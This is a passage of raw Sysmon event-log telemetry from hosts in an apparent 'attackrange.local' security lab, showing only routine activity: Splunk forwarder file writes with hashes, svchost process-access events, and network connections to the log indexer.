Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7774D1290E64E52A3087EB16272004C7,SHA256=85929319043B6C6CE15FB45B13922E3EEFD7EFD8A60EF2A36737476CF1D5C7A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441673Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:55.281{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441672Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:55.281{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441671Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:55.229{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FA2EA390FF875AFC1595757B17FA4AF,SHA256=A1E8308B741007B4BC21209AD8E2D84F3F6E2C28846F3946E40136F5A9FAB247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441677Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:56.442{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46934C3BCA83416A4DC91223FC75CBBD,SHA256=91CB4A692DD40C80665E2A2ECE2E1E733610BB1C80FF34804E0568020CF2A5A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293313Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:56.089{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EBD7CF91EB80D34BCD383DFB9446450,SHA256=2AB35729E8488D536A4897017218B4D57F90AB85548579C85D66AB4DFDEEE89D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441676Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:56.282{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441675Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:56.282{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441674Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:56.107{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=146D0A6C56233E697082E526E8BF3CE9,SHA256=C66C290EE9EB15022A8EF26A5B2F9E4D514415993AFDB241EC09C8DF63EB297B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441681Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:57.453{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EC6DC7958A5B78C1E0B7F9B6145F139,SHA256=2F3EAF8B71C66059C5F132AC2BFE4BA06DEA3B11742240BB57BC303B1B4BA8E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293314Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:57.121{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AFDBDB2AAF7F34C26AAF372784D0609,SHA256=10DCA4A4A9AD6B2EDE0A6413FAC1CF1CAC193362EB872459254D512DC8CAF26A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441680Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:57.283{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441679Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:57.283{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441678Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.546{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62435-false10.0.1.12-8000- 23542300x8000000000000000441684Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:58.467{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8584E8482DAF578B603AC039FEB655A,SHA256=2EA607D13E83E1D1020157927A5CFEE0D643DC316F3E5296FE935E56E3B90C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293315Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:58.158{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2FE7B15DCA9606B7888DC85FEDDB504,SHA256=4D944820B8B2224A7F44708A0DBE5F7128F4A0EFEEAD157B8018D703F39ECD54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441683Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:58.284{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441682Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:58.284{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441687Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:59.509{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBEAE814C7D9DA081F1CBAA3B3B1C63E,SHA256=9C3EFD2E4716FB1E43E794C5732C7A9C60F9DF7AF6FC80915F248ABA50A37A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293316Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:59.159{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=526F87B964052AA329DCA09035E7029A,SHA256=F28ED1DA803109CE587F797DC77E503D043393DAD252C14DF1491AD7AEAAA036,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441686Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:59.285{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441685Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:59.285{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293317Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:00.174{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EE07C783D0DF555D412E96E21FD13A3,SHA256=A3D3F76711482C362C35DF8878F938D32DFD3C6FCFB5849E7C6155A5697D750C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441690Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:00.512{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5A515D08DDB8AD77E0467B356F97E60,SHA256=E31EBE1CECB75A348F41B5A23F2A41263FB2300301E2E4CA5682C5AAACE8D417,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441689Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:00.286{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441688Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:00.286{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000293321Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:59.486{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50666-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000293320Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:01.204{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44C097B5B0291F1A153CCF8B36DA82BD,SHA256=979EDE62CB33AA39D0B3767CA2173B384D5486ADAED8D57AF33DF3FF92780071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293319Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:01.204{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DADD97E1E006BB16F7503CAB239DD2B,SHA256=800623C420CCFB833D05B2AA6C85EBE94813D453CA3083EF5B3ADCA171B09620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293318Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:01.204{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BA3409740761DC14A0FBBA6FFF87798,SHA256=8517954B47362B1CE6EFF8EDC9BC0670A4575E60B316A4426B52D5318971F464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441695Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:01.542{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5756CA91E70D2210EFA2AC23F03A18,SHA256=47096B6043318C982D4E14A36E4F8BE289F7ACE9E9F7844E143355A8F8768CD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441694Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:01.287{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441693Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:01.287{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441692Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:01.256{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADACEB28FDD4AA94FA509C25C444F4C0,SHA256=F18D5AE85BE688E08F79E7398BF56E585A3E29B1820FA21603087AED9A610D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441691Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:01.255{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACCEDF10929751B4CC8AACC558FB604C,SHA256=071FE1AD8B6D73A9771838B06C26001E394A19A28508017DF4C7FC3F0C656634,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441699Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:02.549{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C353B132A127EBC752E1987D3B17C94,SHA256=FC3B2D8D52A9BAB326B18C4D188E623C249BCAB54AF12B74E0EAD5DB78690511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293322Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:02.221{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7139D4FD3C6E1EAD80DBC8D6BAC8E8F5,SHA256=03C0499D543046E4ECDA2A3BD1965CF26602C218C341A2103BAEDE382E7E260D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441698Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:02.288{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441697Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:02.288{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441696Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:58.667{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62436-false10.0.1.12-8000- 23542300x8000000000000000441702Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:03.568{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82E24CF53ABBF38FFFBF732D23FDA6A4,SHA256=DA218F019D1B116E70A9FC04B7EB789ABEBD629AB38BE6BBF478B7418755DD2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293324Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:59.930{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-96.attackrange.local50667-false205.185.216.10map2.hwcdn.net80http 23542300x8000000000000000293323Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:03.240{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DFDCDE59F4D8FB1931526E547CB779,SHA256=4E16FF711BBB35709907498CBCF15B5E4DB1FDDD8E270F9918B2A996E8153C90,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441701Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 